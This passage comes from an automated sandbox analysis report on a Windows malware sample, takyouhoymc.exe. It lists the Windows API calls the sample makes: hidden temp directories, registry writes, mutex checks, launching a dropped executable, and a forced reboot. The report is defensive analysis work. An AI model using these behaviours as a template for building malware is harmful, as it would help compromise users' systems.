                                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\takyouhoymc.exe,00000104,776AC310,00000000,0040DBDD), ref: 0040D7DF
                                                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\), ref: 0040D7EC
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,0042A3B0), ref: 0040D7F8
                                                                                                                                                                                                                                                        • Part of subcall function 00414BF8: lstrcpyA.KERNEL32(00000001,00000002,776AC310,00000000,?,0040DB17,C:\Windows\system32\), ref: 00414C42
                                                                                                                                                                                                                                                        • Part of subcall function 0040C018: lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,C:\Users\user\AppData\Local\Temp\,00000104,C:\Users\user\AppData\Local\Temp\,?,00000000,0040D80A), ref: 0040C02D
                                                                                                                                                                                                                                                        • Part of subcall function 0040C018: lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,-00000006,?,00000000,0040D80A), ref: 0040C042
                                                                                                                                                                                                                                                        • Part of subcall function 0040C018: SetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000007,?,00000000,0040D80A), ref: 0040C058
                                                                                                                                                                                                                                                        • Part of subcall function 0040C018: lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,0042A3B0,?,00000000,0040D80A), ref: 0040C064
                                                                                                                                                                                                                                                        • Part of subcall function 0040C018: lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\mjvsikbqngeunkjyurda\,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,?,00000000,0040D80A), ref: 0040C071
                                                                                                                                                                                                                                                        • Part of subcall function 0040C018: lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\mjvsikbqngeunkjyurda\,-0000000C,?,00000000,0040D80A), ref: 0040C084
                                                                                                                                                                                                                                                        • Part of subcall function 0040C018: SetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000007,?,?,?,?,00000000,0040D80A), ref: 0040C09A
                                                                                                                                                                                                                                                        • Part of subcall function 0040C018: lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\mjvsikbqngeunkjyurda\,0042A3B0,?,?,?,?,00000000,0040D80A), ref: 0040C0A6
                                                                                                                                                                                                                                                        • Part of subcall function 0040C34F: GetCurrentProcess.KERNEL32(00000008,?,00000000), ref: 0040C37A
                                                                                                                                                                                                                                                        • Part of subcall function 0040C34F: OpenProcessToken.ADVAPI32(00000000), ref: 0040C381
                                                                                                                                                                                                                                                        • Part of subcall function 00415EAD: RegCreateKeyExA.KERNEL32(80000002,00000000,0040D819,00000000,C:\Users\user\AppData\Local\Temp\), ref: 00415EE9
                                                                                                                                                                                                                                                        • Part of subcall function 00415EAD: RegSetValueExA.KERNEL32(0040D819,00000000,?,?,00000000,00000004,?,00000004), ref: 00415F12
                                                                                                                                                                                                                                                        • Part of subcall function 00415EAD: RegCloseKey.ADVAPI32(0040D819,?,?,00000000,00000004,?,00000004), ref: 00415F1B
                                                                                                                                                                                                                                                        • Part of subcall function 00415C5F: RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,00020019,00000000), ref: 00415CA3
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D832
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Filelstrcatlstrcpy$AttributesOpenProcesslstrlen$CloseCountCreateCurrentModuleNamePathTempTickTokenValue
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                      • API String ID: 312997863-849940345
                                                                                                                                                                                                                                                      • Opcode ID: 66a191b1396e23743340b3bf8f99a660aa270ad2aa5ebc0f0f600cc81104f07c
                                                                                                                                                                                                                                                      • Instruction ID: 34194b556595efbbea820b7bb6b9162989cf9261f3116618f2beeb079c5b6fcb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66a191b1396e23743340b3bf8f99a660aa270ad2aa5ebc0f0f600cc81104f07c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7F05E32606350ABC3117BA66C09B8A2AA49B92716F44403EFC09A1193CF7D845E87BE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(mscoree.dll,00423EB5,00428591,?,00423ED5,00000000), ref: 00423D61
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00423D71
                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00423D85
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressExitHandleModuleProcProcess
                                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                      • API String ID: 75539706-1276376045
                                                                                                                                                                                                                                                      • Opcode ID: 73766fcf5377165176eb8aa766b74b14e4662fc7e278a5af44fe28294c543645
                                                                                                                                                                                                                                                      • Instruction ID: d681029f06332e7bb9a77ada203d812da5940a19e6021aafab7c3ebf6d4e0ead
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73766fcf5377165176eb8aa766b74b14e4662fc7e278a5af44fe28294c543645
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63D0C730740211ABDA102F71BC4DA2A3768FF40B02B844439B805D0160CB38D927E61E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,0040D819,00000000,C:\Users\user\AppData\Local\Temp\), ref: 00415EE9
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(0040D819,00000000,?,?,00000000,00000004,?,00000004), ref: 00415F12
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(0040D819,?,?,00000000,00000004,?,00000004), ref: 00415F1B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00415EB6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseCreateValue
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                                      • API String ID: 1818849710-787714339
                                                                                                                                                                                                                                                      • Opcode ID: 40e6c71a992a7c2e8f09d534d622b9993dff3e98155a1071289031704242a58b
                                                                                                                                                                                                                                                      • Instruction ID: d33b6102d000e128b126aea15ab64def901b4170a75cf8a89fc65d3170fde99c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40e6c71a992a7c2e8f09d534d622b9993dff3e98155a1071289031704242a58b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DF036B1941238BADB109B919C4AFEF7F7CEF05755F504075BA04E1051DA705B48C7A5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(00000043), ref: 0040D4AB
                                                                                                                                                                                                                                                        • Part of subcall function 00413DD8: ExitWindowsEx.USER32(00000006,00050005), ref: 00413DED
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 0040D4C5
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(shutdown -r), ref: 0040D4D8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep$CallbackDispatcherExitUserWindows
                                                                                                                                                                                                                                                      • String ID: shutdown -r
                                                                                                                                                                                                                                                      • API String ID: 2129780474-3966090723
                                                                                                                                                                                                                                                      • Opcode ID: d65347461eb1159606083e011ae0f0cf97533425740c30ccdfe41762bb4e863b
                                                                                                                                                                                                                                                      • Instruction ID: d656d09b155cd6634d9f5f8501bfea0dcfe2fee2f2a7f8f05d117fa0df0b0c8d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d65347461eb1159606083e011ae0f0cf97533425740c30ccdfe41762bb4e863b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72D0C730B842219BD5203FE15D0775D39646F10715F81007FAD457A1D1CEBDA6619A6F
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,00020019,00000000), ref: 00415CA3
                                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(00000000,00000000,?,?,00000000,?,00000001,?), ref: 00415CD9
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000001,?), ref: 00415CE6
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000001,?), ref: 00415CEE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Close$OpenQueryValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1607946009-0
                                                                                                                                                                                                                                                      • Opcode ID: a491de724d99324340aeb177c98d6297e6913b01a10ba44178b77f50eafc96a5
                                                                                                                                                                                                                                                      • Instruction ID: 351be250b04c206962fd1380f2a074eff5c3e03c83a55a2369d373208c135491
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a491de724d99324340aeb177c98d6297e6913b01a10ba44178b77f50eafc96a5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43115EB1A00218FFEB119FA0DC46FEEBBBCAB04705F50047AA505E5082EB749A449B69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00413663: lstrlenA.KERNEL32(4941262305804196,?,?,00000000), ref: 00413691
                                                                                                                                                                                                                                                      • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 0040C591
                                                                                                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000), ref: 0040C5A7
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040C5AF
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040C5BA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Mutex$CloseCreateErrorHandleLastOpenlstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 592644537-0
                                                                                                                                                                                                                                                      • Opcode ID: 000a1266c8250fe00c398a31faa2c87a8f7fc2f543a9cf41a7e6eb80620c8649
                                                                                                                                                                                                                                                      • Instruction ID: c80b6dc3ec81cb7e527f81272f8b9e0629b83a31c53efe65eae3f0c2fc373074
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 000a1266c8250fe00c398a31faa2c87a8f7fc2f543a9cf41a7e6eb80620c8649
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4001DB36500224BBDB325B64DC45FE63BACAB08750F0001B7FA45E61C1DAB49B898EA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0040C472: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 0040C4B4
                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000,00000000,00000001), ref: 0040D06C
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 0040D080
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe, xrefs: 0040D065
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExecuteMutexOpenShellSleep
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe
                                                                                                                                                                                                                                                      • API String ID: 3313497417-2091069259
                                                                                                                                                                                                                                                      • Opcode ID: 8dd72d10b48480686d8a68e1f1a7e5594e31e5efcd4691a26b6dd1b9084c5060
                                                                                                                                                                                                                                                      • Instruction ID: 3e9c2417071d30d14c851cbdd2542e738391786d2d5ab44393d6f6cb1bd2832f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8dd72d10b48480686d8a68e1f1a7e5594e31e5efcd4691a26b6dd1b9084c5060
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59F0AF61AC1214A9FE2067F09C92FF713080B1231EF14013BBD84B60C3CAAD0C4ED26D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,76AF3520,00000000,00413BDE,?,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe), ref: 00413843
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 0041384D
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: CloseHandle.KERNEL32(00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413856
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(0040C791,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,76AE83C0,76AE8A60,?,0040C791,00000000), ref: 00401E78
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,0040C791,00000000,?,00000000,76AE83C0,76AE8A60,?,0040C791,00000000), ref: 00401E8E
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,76AE83C0,76AE8A60,?,0040C791,00000000), ref: 00401E97
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandle$ReadSize
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 544545239-0
                                                                                                                                                                                                                                                      • Opcode ID: e69d7c9796f7011418dbdc12bb5b1820b9feb26d2d6a72cc67a0287690586167
                                                                                                                                                                                                                                                      • Instruction ID: 70d0acc40c6bbc286e2840f8266f4b633dd67f2653dc02f1a20cf65559c156c9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e69d7c9796f7011418dbdc12bb5b1820b9feb26d2d6a72cc67a0287690586167
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A0126719042087BDB212BA59C89EFF3F6CDF423A8F10016AF901720D1DA7D0A5686A9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,76AF3520,00000000,00413BDE,?,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe), ref: 00413843
                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 0041384D
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413856
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1378416451-0
